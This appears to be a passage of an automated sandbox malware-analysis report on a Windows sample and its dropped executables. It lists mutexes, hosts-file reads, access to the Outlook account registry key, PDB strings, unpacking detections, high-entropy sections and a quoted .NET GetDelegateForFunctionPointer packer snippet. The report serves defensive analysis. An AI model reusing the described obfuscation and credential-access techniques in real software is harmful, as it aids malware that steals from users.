                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5788:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5756
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCommand line argument: \H
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCommand line argument: \H
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: U3E7zMaux2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 7801.exe, 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.769293976.0000000001136000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: )C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb86 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
                          Source: Binary string: profapi.pdb*6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: el.pdb source: 7801.exe
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdbz6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7CA1.exe, 00000014.00000000.769330269.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: /;C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: fltLib.pdb&6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
                          Source: Binary string: C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp

                          Data Obfuscation:

                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeUnpacked PE file: 20.2.7CA1.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeUnpacked PE file: 21.2.86C4.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeUnpacked PE file: 36.2.lagavljy.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeUnpacked PE file: 20.2.7CA1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeUnpacked PE file: 21.2.86C4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeUnpacked PE file: 36.2.lagavljy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeUnpacked PE file: 43.2.7801.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Yara detected BatToExe compiled binary
                          Source: Yara matchFile source: 00000032.00000002.864947877.0000000000BF0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.894641410.00000000022C0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.864706939.00000000005F0000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.864824644.000000000079A000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.864795005.0000000000790000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.894589865.0000000002420000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.894618971.0000000002427000.00000004.00000040.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00404CE9 push ecx; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_004038B3 push ecx; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00412EA4 push eax; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00523C66 push esi; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00523C01 push esi; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00533634 push es; iretd
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 17_2_00523C66 push esi; ret
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 17_2_00523C01 push esi; ret
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00465C53 push ss; retf
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00463EE0 pushad ; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0046128B push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00464941 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00464973 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_00FA8508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_00FA764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_03194003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032CA7DD push ebp; retf
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032C0D8C push E86CED43h; retf
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_05992503 push E80A995Eh; ret
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00463A79 push 0000002Bh; iretd
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00461283 push ds; ret
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_0040A3DE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: 8EC4.exe.7.drStatic PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: 8ED5.exe.7.drStatic PE information: section name: .gizi
                          Source: 8ED5.exe.7.drStatic PE information: section name: .bur
                          Source: 8ED5.exe.7.drStatic PE information: section name: .wob
                          Source: 9A02.exe.7.drStatic PE information: section name: .code
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name: .T3QbYgM
                          Source: ACEF.exe.7.drStatic PE information: section name: .adata
                          Source: BEB3.exe.7.drStatic PE information: section name: .didata
                          Source: CC60.exe.7.drStatic PE information: section name: .code
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: CC60.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x60613
                          Source: ACEF.exe.7.drStatic PE information: real checksum: 0x361362 should be: 0x3775f1
                          Source: 8EC4.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: 9A02.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x5e577
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: entropy: 7.9969707961
                          Source: initial sampleStatic PE information: section name: entropy: 7.91194455639
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22501727341
                          Source: initial sampleStatic PE information: section name: .T3QbYgM entropy: 7.91938761659
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 8EC4.exe.7.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.2.8EC4.exe.fa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.0.8EC4.exe.610000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.0.8EC4.exe.610000.9.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.2.8EC4.exe.610000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
